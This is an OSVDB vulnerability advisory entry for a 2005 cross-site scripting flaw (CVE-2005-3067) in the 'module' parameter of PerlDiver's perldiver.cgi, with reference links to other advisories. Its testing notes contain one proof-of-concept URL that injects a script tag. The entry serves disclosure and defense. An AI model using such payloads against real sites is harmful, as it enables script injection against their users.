PerlDiver perldiver.cgi module Variable XSS

2005-09-20T17:01:27
ID OSVDB:19578
Type osvdb
Reporter OSVDB
Modified 2005-09-20T17:01:27

Description

Manual Testing Notes

http://[host]/[path]/perldiver.cgi?action=2020&module=<script>document.write(document.domain)</script>

References:

Vendor URL: http://scriptsolutions.com/ Vendor Specific News/Changelog Entry: http://www.scriptsolutions.com/support/showflat.pl?Cat=&Board=PDBugs&Number=443&page=0&view=collapsed&sb=5&o=0&fpart= Security Tracker: 1015146 Secunia Advisory ID:16888 Related OSVDB ID: 19577 Other Advisory URL: http://exploitlabs.com/files/advisories/EXPL-A-2005-014-perldiver.txt Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-09/0543.html Keyword: EXPL-A-2005-014 exploitlabs.com Advisory 043 CVE-2005-3067